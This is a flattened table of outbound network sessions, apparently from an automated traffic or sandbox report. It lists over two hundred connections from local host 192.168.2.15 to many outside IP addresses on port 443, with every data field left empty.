                                            17627192.168.2.154437493.192.12.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17628192.168.2.1560476176.171.95.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17629192.168.2.1536554125.74.239.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17630192.168.2.155036219.199.173.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17631192.168.2.153585096.115.112.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17632192.168.2.1544214163.92.253.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17633192.168.2.155549279.39.236.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17634192.168.2.153890277.112.133.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17635192.168.2.1543468216.198.201.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17636192.168.2.1560308190.4.216.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17637192.168.2.153499285.248.215.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17638192.168.2.153402085.191.165.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17639192.168.2.155500462.52.149.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17640192.168.2.154637093.79.140.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17641192.168.2.154040477.102.191.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17642192.168.2.155650697.142.171.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17643192.168.2.155809080.71.187.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17644192.168.2.1535864164.49.104.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17645192.168.2.15573545.121.188.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17646192.168.2.155584859.116.181.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17647192.168.2.155772891.219.0.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17648192.168.2.1534556109.73.24.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17649192.168.2.155940235.202.198.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17650192.168.2.153691076.220.66.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17651192.168.2.154366825.184.14.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17652192.168.2.155897051.68.110.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17653192.168.2.155578684.8.116.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17654192.168.2.15508041.168.112.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17655192.168.2.154872063.35.17.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17656192.168.2.155015652.242.229.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17657192.168.2.154744249.58.168.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17658192.168.2.153611213.184.181.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17659192.168.2.1543956186.20.56.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17660192.168.2.1535914153.60.217.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17661192.168.2.1557636177.172.73.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17662192.168.2.153475019.148.141.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17663192.168.2.1538238219.83.50.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17664192.168.2.1558332192.50.127.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17665192.168.2.1548826219.230.45.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17666192.168.2.1553904129.227.4.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17667192.168.2.1546626163.19.77.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17668192.168.2.1545512119.140.152.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17669192.168.2.1553072191.58.238.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17670192.168.2.1545190135.218.158.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17671192.168.2.154962624.122.150.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17672192.168.2.153299276.107.137.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17673192.168.2.1541030119.172.105.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17674192.168.2.1543600223.158.244.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17675192.168.2.153636690.1.207.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17676192.168.2.153554453.156.150.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17677192.168.2.155362827.145.0.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17678192.168.2.1556126184.187.63.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17679192.168.2.153428291.116.61.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17680192.168.2.1534076167.53.71.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17681192.168.2.154706214.29.49.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17682192.168.2.1536680108.139.61.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17683192.168.2.155713612.213.112.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17684192.168.2.1557322222.15.222.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17685192.168.2.1538278198.57.110.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17686192.168.2.1537546116.15.110.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17687192.168.2.155044890.255.71.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17688192.168.2.1552408209.92.136.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17689192.168.2.154214883.88.197.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17690192.168.2.154656436.87.110.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17691192.168.2.1553222156.178.87.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17692192.168.2.1538486166.89.209.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17693192.168.2.155239278.146.229.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17694192.168.2.1545064163.164.254.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17695192.168.2.1560668101.21.201.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17696192.168.2.1553344200.188.137.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17697192.168.2.1557726198.90.100.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17698192.168.2.156092094.11.97.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17699192.168.2.1551178133.86.171.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17700192.168.2.155243236.209.194.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17701192.168.2.156038265.67.111.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17702192.168.2.1549746191.66.218.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17703192.168.2.153293642.84.74.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17704192.168.2.1537454205.251.2.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17705192.168.2.1538820211.96.139.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17706192.168.2.154904634.64.89.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17707192.168.2.156087098.172.232.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17708192.168.2.1555960148.53.12.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17709192.168.2.1535316190.211.128.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17710192.168.2.1537080200.147.251.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17711192.168.2.1534236126.188.46.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17712192.168.2.1547644211.15.101.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17713192.168.2.153732454.111.103.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17714192.168.2.1551310110.237.175.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17715192.168.2.1547440115.56.62.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17716192.168.2.1537084189.50.160.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17717192.168.2.1548182120.231.44.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17718192.168.2.1557170165.142.208.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17719192.168.2.1540792201.47.248.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17720192.168.2.1538614216.162.72.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17721192.168.2.1542514217.166.214.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17722192.168.2.155815491.230.226.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17723192.168.2.1535352161.154.65.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17724192.168.2.1558110192.95.178.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17725192.168.2.1537560202.212.120.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17726192.168.2.1548712176.111.253.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17727192.168.2.154704827.178.18.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17728192.168.2.1551778137.101.15.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17729192.168.2.1557576131.239.213.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17730192.168.2.1545442114.200.3.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17731192.168.2.1540892187.84.160.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17732192.168.2.1535790108.220.157.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17733192.168.2.1551256201.228.198.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17734192.168.2.155852054.62.210.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17735192.168.2.1545146177.32.187.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17736192.168.2.1547374115.11.173.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17737192.168.2.1539606124.36.59.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17738192.168.2.154881883.192.207.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17739192.168.2.1541500220.102.39.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17740192.168.2.153917086.42.192.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17741192.168.2.155255091.117.91.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17742192.168.2.1539484111.65.79.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17743192.168.2.1544936158.190.111.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17744192.168.2.1540318181.253.7.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17745192.168.2.1555264154.200.225.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17746192.168.2.1559908176.14.131.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17747192.168.2.1538058141.108.193.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17748192.168.2.153330686.89.185.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17749192.168.2.1555528126.119.10.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17750192.168.2.155778024.238.134.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17751192.168.2.1543844114.194.94.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17752192.168.2.155930270.252.233.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17753192.168.2.154478854.248.216.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17754192.168.2.153831451.147.236.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17755192.168.2.154769686.199.36.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17756192.168.2.1555584154.154.93.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17757192.168.2.1549014108.204.198.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17758192.168.2.1537502192.144.118.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17759192.168.2.1537168197.90.148.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17760192.168.2.1547938128.136.119.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17761192.168.2.155098497.166.68.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17762192.168.2.1552328123.32.153.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17763192.168.2.155476281.231.19.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17764192.168.2.1535382206.127.22.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17765192.168.2.154989819.130.42.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17766192.168.2.153571058.210.22.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17767192.168.2.154241481.182.98.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17768192.168.2.155658023.90.124.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17769192.168.2.1550274117.25.55.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17770192.168.2.1552214153.2.213.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17771192.168.2.1552656151.240.145.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17772192.168.2.155701272.104.57.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17773192.168.2.1534806181.173.15.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17774192.168.2.1545408187.99.238.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17775192.168.2.1537440138.177.151.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17776192.168.2.1535180210.136.248.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17777192.168.2.153430036.242.28.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17778192.168.2.1550686128.71.154.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17779192.168.2.155285646.210.169.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17780192.168.2.1539296168.9.10.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17781192.168.2.1547334208.176.50.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17782192.168.2.1555278162.67.108.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17783192.168.2.155479014.63.75.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17784192.168.2.1544796140.173.70.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17785192.168.2.155221046.12.77.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17786192.168.2.1540714117.225.121.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17787192.168.2.1543586202.64.19.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17788192.168.2.1542438184.136.243.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17789192.168.2.1555534163.21.102.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17790192.168.2.1533270101.210.55.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17791192.168.2.153737845.162.41.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17792192.168.2.1558678116.26.143.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17793192.168.2.155595266.32.178.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17794192.168.2.1539926121.234.24.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17795192.168.2.154998848.1.98.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17796192.168.2.1560132169.119.214.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17797192.168.2.1553562196.187.14.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17798192.168.2.1539452102.198.63.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17799192.168.2.1556958143.48.108.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17800192.168.2.154521846.168.227.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17801192.168.2.1540472163.193.46.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17802192.168.2.155563289.228.146.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17803192.168.2.1552684148.194.171.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17804192.168.2.155843484.190.192.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17805192.168.2.153629625.245.48.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17806192.168.2.154344485.13.223.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17807192.168.2.155892846.23.178.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17808192.168.2.1543038177.140.0.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17809192.168.2.153303240.187.149.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17810192.168.2.153894671.208.231.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17811192.168.2.154143480.109.74.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17812192.168.2.1546460129.25.42.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17813192.168.2.1535894205.217.226.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17814192.168.2.1538586141.116.167.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17815192.168.2.1541398119.244.135.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17816192.168.2.1545842131.45.238.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17817192.168.2.153391482.178.250.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17818192.168.2.1557032159.149.62.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17819192.168.2.153310859.117.69.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17820192.168.2.155167840.234.35.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17821192.168.2.155759279.97.144.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17822192.168.2.1542396103.99.159.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17823192.168.2.1542356208.194.51.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17824192.168.2.1539108184.207.105.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17825192.168.2.1545286129.33.113.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17826192.168.2.1544518132.149.17.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17827192.168.2.1554500118.189.81.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17828192.168.2.1540078182.58.65.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17829192.168.2.1556346197.148.158.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17830192.168.2.153277245.160.237.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17831192.168.2.1553932130.126.61.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17832192.168.2.155079457.22.70.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17833192.168.2.1552888119.194.118.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17834192.168.2.154019214.252.11.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17835192.168.2.1542912159.82.3.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17836192.168.2.154362018.249.187.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17837192.168.2.1551026114.239.39.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17838192.168.2.155120061.190.40.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17839192.168.2.1548304109.253.112.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17840192.168.2.1542696180.33.193.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17841192.168.2.1536826199.152.196.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17842192.168.2.1533124130.24.85.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17843192.168.2.154936861.42.60.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17844192.168.2.1536426199.179.138.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17845192.168.2.154598238.115.185.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17846192.168.2.1536464117.6.220.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17847192.168.2.153950297.134.129.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17848192.168.2.1538036220.94.129.103443
                                            TimestampBytes transferredDirectionData


